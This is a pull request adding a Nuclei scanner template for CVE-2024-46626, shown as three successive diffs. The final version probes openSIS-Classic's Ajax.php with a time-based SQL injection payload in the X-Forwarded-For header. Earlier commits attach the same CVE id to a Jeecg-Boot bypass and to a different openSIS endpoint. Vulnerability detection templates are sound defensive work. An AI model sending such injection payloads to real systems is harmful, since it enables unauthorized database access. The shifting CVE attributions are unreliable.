### PR TITLE
Add CVE-2024-46626 - SQL Injection Vulnerability in openSIS-Classic Version

### DIFF
--- a/CVE-2024-46626.yaml
+++ b/CVE-2024-46626.yaml
@@ -1,0 +1,23 @@
+id: CVE-2024-46626
+info:
+  name: Jeecg-Boot - Login Bypass
+  author: haliteroglu
+  severity: medium
+  description: |
+    Jeecg-Boot is vulnerable to an authentication bypass where attackers can access /sys/randomImage without valid credentials, allowing potential unauthorized access patterns.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-46626
+    - https://github.com/d0ub1edd/CVE-Reference/blob/main/CVE-2024-46626.md
+  tags: cve, jeecgboot, bypass
+  metadata:
+    max-request: 1
+    verified: true
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sys/randomImage"
+    matchers:
+      - type: status
+        status:
+          - 200

--- a/CVE-2024-46626.yaml
+++ b/CVE-2024-46626.yaml
@@ -1,24 +1,29 @@
 id: CVE-2024-46626
 info:
-  name: SQL Injection Vulnerability in openSIS-Classic Version
-  author: haliteroglu
+  name: openSIS-Classic 9.1 - Authenticated SQL Injection via X-Forwarded-For Header
+  author: Haliteroglu
   severity: high
-  description: |
-    SQL injection vulnerability exists in openSIS-Classic version, allowing attackers to inject malicious SQL statements through the ForgotPassword.php endpoint.
+  description: >
+    Authenticated SQL Injection vulnerability in openSIS-Classic 9.1 via the X-Forwarded-For header in Ajax.php. 
+    Allows execution of arbitrary SQL queries by authenticated users.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2024-46626
     - https://github.com/OS4ED/openSIS-Classic
-  tags: cve, sql, injection, opensis, classic
-  metadata:
-    max-request: 1
-    verified: true
-
+  tags: cve,cve2024,sqli,authenticated,opensis
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/ForgotPassword.php?email='"
-
+      - "{{BaseURL}}/Ajax.php?modname=x"
+    headers:
+      X-Forwarded-For: "127.0.0.2' AND SLEEP(5)-- -"
+      Cookie: "{{cookie}}"
     matchers:
-      - type: word
-        words:
-          - "You have an error in your SQL syntax"
+      - type: dsl
+        dsl:
+          - "duration>=5"
+    condition: and
+    extractors:
+      - type: dsl
+        dsl:
+          - "duration"
+

--- a/CVE-2024-46626.yaml
+++ b/CVE-2024-46626.yaml
@@ -1,14 +1,14 @@
 id: CVE-2024-46626
 info:
-  name: Jeecg-Boot - Login Bypass
+  name: SQL Injection Vulnerability in openSIS-Classic Version
   author: haliteroglu
-  severity: medium
+  severity: high
   description: |
-    Jeecg-Boot is vulnerable to an authentication bypass where attackers can access /sys/randomImage without valid credentials, allowing potential unauthorized access patterns.
+    SQL injection vulnerability exists in openSIS-Classic version, allowing attackers to inject malicious SQL statements through the ForgotPassword.php endpoint.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2024-46626
-    - https://github.com/d0ub1edd/CVE-Reference/blob/main/CVE-2024-46626.md
-  tags: cve, jeecgboot, bypass
+    - https://github.com/OS4ED/openSIS-Classic
+  tags: cve, sql, injection, opensis, classic
   metadata:
     max-request: 1
     verified: true
@@ -16,8 +16,9 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/sys/randomImage"
+      - "{{BaseURL}}/ForgotPassword.php?email='"
+
     matchers:
-      - type: status
-        status:
-          - 200
+      - type: word
+        words:
+          - "You have an error in your SQL syntax"


### PR DESCRIPTION
### Description

This Nuclei template detects CVE-2024-46626, an SQL Injection vulnerability in openSIS-Classic

This vulnerability addresses a critical SQL Injection vulnerability found in the openSIS-Classic Version 9.1 web application. The vulnerability allows any authenticated user to exploit the SQL query by injecting malicious SQL code, potentially leading to unauthorized data access or manipulation.


### How to use

```bash
nuclei -u http://target.com -t cves/2024/CVE-2024-46626.yaml
